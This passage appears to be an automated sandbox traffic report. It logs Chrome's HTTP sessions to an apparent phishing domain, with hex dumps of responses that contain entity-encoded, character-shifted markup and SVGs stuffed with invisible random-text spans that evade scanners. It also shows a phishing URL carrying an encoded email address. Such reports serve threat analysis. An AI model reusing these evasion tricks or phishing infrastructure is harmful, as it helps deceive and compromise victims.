                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 33 33 3b 26 23 31 31 36 3b 26 23 31 31 37 3b 26 23 31 32 32 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 36 32 3b 26 23 33 35 3b 26 23 31 31 33 3b 26 23 31 31 32 3b 26 23 31 31 36 3b 26 23 31 30 36 3b 26 23 31 31 37 3b 26 23 31 30 36 3b 26 23 31 31 32 3b 26 23 31 31 31 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 39 38 3b 26 23 39 39 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 31 30 39 3b 26 23 31 31 38 3b 26 23 31 31 37 3b 26 23 31 30 32 3b 26 23 36 30 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 31 30 33 3b 26 23 31 31 37 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 31 31 33 3b 26 23 31 32 31 3b 26 23 36 30 3b 26 23 33 35 3b 26 23 36 33 3b 26 23
                                                                                                                                                              Data Ascii: 3;&#98;&#111;&#33;&#116;&#117;&#122;&#109;&#102;&#62;&#35;&#113;&#112;&#116;&#106;&#117;&#106;&#112;&#111;&#59;&#33;&#98;&#99;&#116;&#112;&#109;&#118;&#117;&#102;&#60;&#109;&#102;&#103;&#117;&#59;&#33;&#46;&#58;&#58;&#58;&#58;&#113;&#121;&#60;&#35;&#63;&#
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 3b 26 23 39 39 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 31 30 39 3b 26 23 31 31 38 3b 26 23 31 31 37 3b 26 23 31 30 32 3b 26 23 36 30 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 31 30 33 3b 26 23 31 31 37 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 31 31 33 3b 26 23 31 32 31 3b 26 23 36 30 3b 26 23 33 35 3b 26 23 36 33 3b 26 23 37 35 3b 26 23 31 30 39 3b 26 23 31 31 39 3b 26 23 38 36 3b 26 23 37 38 3b 26 23 35 30 3b 26 23 37 39 3b 26 23 35 33 3b 26 23 38 37 3b 26 23 38 31 3b 26 23 31 31 37 3b 26 23 31 31 32 3b 26 23 31 31 35 3b 26 23 37 34 3b 26 23 31 30 34 3b 26 23 31 31 35 3b 26 23 38 38 3b 26 23 35 34 3b 26 23 31 31 35 3b 26 23 37 36 3b 26 23 31 30 32 3b 26 23 38 39 3b 26 23 31
                                                                                                                                                              Data Ascii: ;&#99;&#116;&#112;&#109;&#118;&#117;&#102;&#60;&#109;&#102;&#103;&#117;&#59;&#33;&#46;&#58;&#58;&#58;&#58;&#113;&#121;&#60;&#35;&#63;&#75;&#109;&#119;&#86;&#78;&#50;&#79;&#53;&#87;&#81;&#117;&#112;&#115;&#74;&#104;&#115;&#88;&#54;&#115;&#76;&#102;&#89;&#1
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 31 31 33 3b 26 23 31 32 31 3b 26 23 36 30 3b 26 23 33 35 3b 26 23 36 33 3b 26 23 35 32 3b 26 23 31 30 37 3b 26 23 31 30 38 3b 26 23 35 30 3b 26 23 31 30 31 3b 26 23 31 32 33 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 26 23 31 30 32 3b 26 23 37 36 3b 26 23 38 32 3b 26 23 39 39 3b 26 23 31 31 36 3b 26 23 39 30 3b 26 23 31 31 39 3b 26 23 31 32 33 3b 26 23 35 36 3b 26 23 37 35 3b 26 23 38 39 3b 26 23 31 30 31 3b 26 23 37 33 3b 26 23 39 38 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 31 32 32 3b 26 23 38 33 3b 26 23 37 33 3b 26 23 31 30 34 3b 26 23 36 31 3b 26 23 34 38 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 36 33 3b 26 23 39 38 3b 26
                                                                                                                                                              Data Ascii: &#33;&#46;&#58;&#58;&#58;&#58;&#113;&#121;&#60;&#35;&#63;&#52;&#107;&#108;&#50;&#101;&#123;&#110;&#112;&#102;&#76;&#82;&#99;&#116;&#90;&#119;&#123;&#56;&#75;&#89;&#101;&#73;&#98;&#78;&#122;&#122;&#83;&#73;&#104;&#61;&#48;&#116;&#113;&#98;&#111;&#63;&#98;&
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 23 37 36 3b 26 23 37 36 3b 26 23 38 31 3b 26 23 37 35 3b 26 23 37 31 3b 26 23 35 31 3b 26 23 38 39 3b 26 23 37 39 3b 26 23 37 30 3b 26 23 36 37 3b 26 23 31 31 31 3b 26 23 37 30 3b 26 23 38 34 3b 26 23 31 30 33 3b 26 23 36 31 3b 26 23 34 38 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 36 33 3b 26 23 31 30 31 3b 26 23 36 31 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 33 33 3b 26 23 31 31 36 3b 26 23 31 31 37 3b 26 23 31 32 32 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 36 32 3b 26 23 33 35 3b 26 23 31 31 33 3b 26 23 31 31 32 3b 26 23 31 31 36 3b 26 23 31 30 36 3b 26 23 31 31 37 3b 26 23 31 30 36 3b 26 23 31 31 32 3b 26 23 31 31 31 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 39 38 3b 26 23 39 39
                                                                                                                                                              Data Ascii: #76;&#76;&#81;&#75;&#71;&#51;&#89;&#79;&#70;&#67;&#111;&#70;&#84;&#103;&#61;&#48;&#116;&#113;&#98;&#111;&#63;&#101;&#61;&#116;&#113;&#98;&#111;&#33;&#116;&#117;&#122;&#109;&#102;&#62;&#35;&#113;&#112;&#116;&#106;&#117;&#106;&#112;&#111;&#59;&#33;&#98;&#99
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 3b 26 23 34 35 3b 26 23 33 33 3b 26 23 31 31 33 3b 26 23 36 31 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 33 33 3b 26 23 31 31 36 3b 26 23 31 31 37 3b 26 23 31 32 32 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 36 32 3b 26 23 33 35 3b 26 23 31 31 33 3b 26 23 31 31 32 3b 26 23 31 31 36 3b 26 23 31 30 36 3b 26 23 31 31 37 3b 26 23 31 30 36 3b 26 23 31 31 32 3b 26 23 31 31 31 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 39 38 3b 26 23 39 39 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 31 30 39 3b 26 23 31 31 38 3b 26 23 31 31 37 3b 26 23 31 30 32 3b 26 23 36 30 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 31 30 33 3b 26 23 31 31 37 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23
                                                                                                                                                              Data Ascii: ;&#45;&#33;&#113;&#61;&#116;&#113;&#98;&#111;&#33;&#116;&#117;&#122;&#109;&#102;&#62;&#35;&#113;&#112;&#116;&#106;&#117;&#106;&#112;&#111;&#59;&#33;&#98;&#99;&#116;&#112;&#109;&#118;&#117;&#102;&#60;&#109;&#102;&#103;&#117;&#59;&#33;&#46;&#58;&#58;&#58;&#
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 32 3b 26 23 31 31 31 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 39 38 3b 26 23 39 39 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 31 30 39 3b 26 23 31 31 38 3b 26 23 31 31 37 3b 26 23 31 30 32 3b 26 23 36 30 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 31 30 33 3b 26 23 31 31 37 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 31 31 33 3b 26 23 31 32 31 3b 26 23 36 30 3b 26 23 33 35 3b 26 23 36 33 3b 26 23 35 30 3b 26 23 34 39 3b 26 23 37 31 3b 26 23 37 33 3b 26 23 38 37 3b 26 23 31 30 37 3b 26 23 37 33 3b 26 23 38 38 3b 26 23 31 32 33 3b 26 23 31 30 34 3b 26 23 35 30 3b 26 23 37 31 3b 26 23 35 32 3b 26 23 31 31 31 3b 26 23 31 30 31 3b 26 23 37 36 3b 26 23 31 30 39 3b 26 23 36 37 3b 26 23 31 31
                                                                                                                                                              Data Ascii: 2;&#111;&#59;&#33;&#98;&#99;&#116;&#112;&#109;&#118;&#117;&#102;&#60;&#109;&#102;&#103;&#117;&#59;&#33;&#46;&#58;&#58;&#58;&#58;&#113;&#121;&#60;&#35;&#63;&#50;&#49;&#71;&#73;&#87;&#107;&#73;&#88;&#123;&#104;&#50;&#71;&#52;&#111;&#101;&#76;&#109;&#67;&#11
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 3b 26 23 31 30 39 3b 26 23 31 30 32 3b 26 23 31 30 33 3b 26 23 31 31 37 3b 26 23 35 39 3b 26 23 33 33 3b 26 23 34 36 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 35 38 3b 26 23 31 31 33 3b 26 23 31 32 31 3b 26 23 36 30 3b 26 23 33 35 3b 26 23 36 33 3b 26 23 38 38 3b 26 23 31 32 31 3b 26 23 39 38 3b 26 23 36 39 3b 26 23 35 31 3b 26 23 35 38 3b 26 23 37 32 3b 26 23 38 37 3b 26 23 38 34 3b 26 23 31 32 31 3b 26 23 35 31 3b 26 23 38 39 3b 26 23 36 31 3b 26 23 34 38 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 36 33 3b 26 23 31 31 35 3b 26 23 33 33 3b 26 23 38 34 3b 26 23 36 31 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 38 3b 26 23 31 31 31 3b 26 23 33 33 3b 26 23 31 31 36 3b 26 23 31 31 37 3b 26 23 31 32 32 3b 26
                                                                                                                                                              Data Ascii: ;&#109;&#102;&#103;&#117;&#59;&#33;&#46;&#58;&#58;&#58;&#58;&#113;&#121;&#60;&#35;&#63;&#88;&#121;&#98;&#69;&#51;&#58;&#72;&#87;&#84;&#121;&#51;&#89;&#61;&#48;&#116;&#113;&#98;&#111;&#63;&#115;&#33;&#84;&#61;&#116;&#113;&#98;&#111;&#33;&#116;&#117;&#122;&


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              44192.168.2.449805172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC800OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMM HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC698INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hMkjQjucqQM22%2FeBr%2FwVDWYBEm%2B0Vm32c3sFcfJ92AwrqduJYdufY5SB1zUiopRH4HMhbSO9WFqJAcJUGrxZiRIOlrgL31XApScuWF9i2YuUguwkkbRyJP1fqUczuyaGiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ef4929c32c-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC671INData Raw: 31 38 61 32 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 36 2e 35 22 20 64 53 4d 72 49 4a 69 47 65 7a 53 3d 22 46 74 56 6f 6b 53 43 62 55 75 22 20 20 68 65 69 67 68 74 3d 22 32 32 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 54 42 64 62 77 71 70 61 42 67 45 5a 58 67 46 6b 61 74 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 35 30 2e 39 33 32 22 20 68 65 69 67 68 74 3d 22 31 30
                                                                                                                                                              Data Ascii: 18a2<svg xmlns="http://www.w3.org/2000/svg" width="106.5" dSMrIJiGezS="FtVokSCbUu" height="22"><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">TBdbwqpaBgEZXgFkat</text><rect width="50.932" height="10
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 7a 72 4a 44 68 68 64 79 69 50 69 46 47 6d 54 56 56 48 4c 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 77 44 57 41 58 43 49 77 64 5a 53 67 75 43 65 41 42 45 51 73 55 4e 49 71 6e 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 66 69 6c 6c 3d 22 74 72 61 6e 73
                                                                                                                                                              Data Ascii: idth: 0.01px;max-height: 0.01px;font-size: 0.01px;">zrJDhhdyiPiFGmTVVHL</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">wDWAXCIwdZSguCeABEQsUNIqn</text><rect width="100%" height="100%" fill="trans
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 2e 38 38 36 2c 30 2c 30 2c 31 2d 31 2e 35 35 34 2e 31 36 34 2c 34 2e 37 30 37 2c 34 2e 37 30 37 2c 30 2c 30 2c 31 2d 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37
                                                                                                                                                              Data Ascii: .886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 2c 31 2e 31 36 34 2d 2e 32 32 31 2e 37 39 2e 37 39 2c 30 2c 30 2c 30 2c 2e 33 37 35 2d 2e 37 34 31 2c 31 2e 30 32 39 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30
                                                                                                                                                              Data Ascii: ,1.164-.221.79.79,0,0,0,.375-.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.0
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 37 2c 30 2c 30 2c 31 2d 32 2e 32 30 39 2d 2e 37 38 34 2c 33 2e 33 34 31 2c 33 2e 33 34 31 2c 30 2c 30 2c 31 2d 2e 37 33 36 2d 32 2e 33 36 33 5a 22 20 20 49 4a 74 56 64 52 43 52 68 4b 49 57 58 53 6b 68 59 44 71 4d 78 76 6f 75 43 41 4e 42 6c 3d 22 48 79 54 69 76 42 66 48 58 58 6a 47 74 57 6b 41 43 6c 55 69 65 75 6f 63 65 67 42 4c 42 22 20 20 66 69 6c 6c 3d 22 23 36 36 36 36 36 36 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 4d 68 56 5a 57 73 4d 4d 73 44 70 66 4a 41 6b 65 6a 71 47 47 54 4d 61 6d
                                                                                                                                                              Data Ascii: 7,0,0,1-2.209-.784,3.341,3.341,0,0,1-.736-2.363Z" IJtVdRCRhKIWXSkhYDqMxvouCANBl="HyTivBfHXXjGtWkAClUieuocegBLB" fill="#666666"/><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">MhVZWsMMsDpfJAkejqGGTMam
                                                                                                                                                              2024-01-17 16:39:33 UTC167INData Raw: 74 79 6c 65 3d 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 20 30 2e 30 35 3b 22 20 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 75 64 56 58 79 4a 61 77 45 74 6f 57 48 72 44 72 76 4b 75 4f 68 5a 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                              Data Ascii: tyle="fill-opacity: 0.05;" /><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">udVXyJawEtoWHrDrvKuOhZ</text></svg>
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              45192.168.2.449803172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC807OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtH HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC706INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OLuiAIkVGEfk9R5h%2FOhhAMo6H%2FHcxnOt7g%2BF0GQsr%2Fzxl3hKe%2B%2BreRapgtWgGBUOVkAJCfKyfwgPdbiiBrBaZpt0R%2FpxkxUv82mRA4HXv4QrOZ74JSt6zohE6WPiEnEBBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ef4a311845-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC663INData Raw: 34 65 66 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 50 33 42 4f 46 42 32 69 68 39 72 48 4a 57 36 66 74 67 48 61 65 42 6a 3c 2f 73 70 61 6e 3e 3c 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79
                                                                                                                                                              Data Ascii: 4ef<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">P3BOFB2ih9rHJW6ftgHaeBj</span><title><span sty
                                                                                                                                                              2024-01-17 16:39:33 UTC607INData Raw: 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 48 46 6e 34 6e 37 6b 4b 34 45 7a 73 34 65 37 43 4d 44 68 61 35 35 3c 2f 73 70 61 6e 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 39 34 34 2c 37 2e 30 35 36 6c 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d
                                                                                                                                                              Data Ascii: fill="#404040"/><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">HFn4n7kK4Ezs4e7CMDha55</span><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              46192.168.2.449807172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
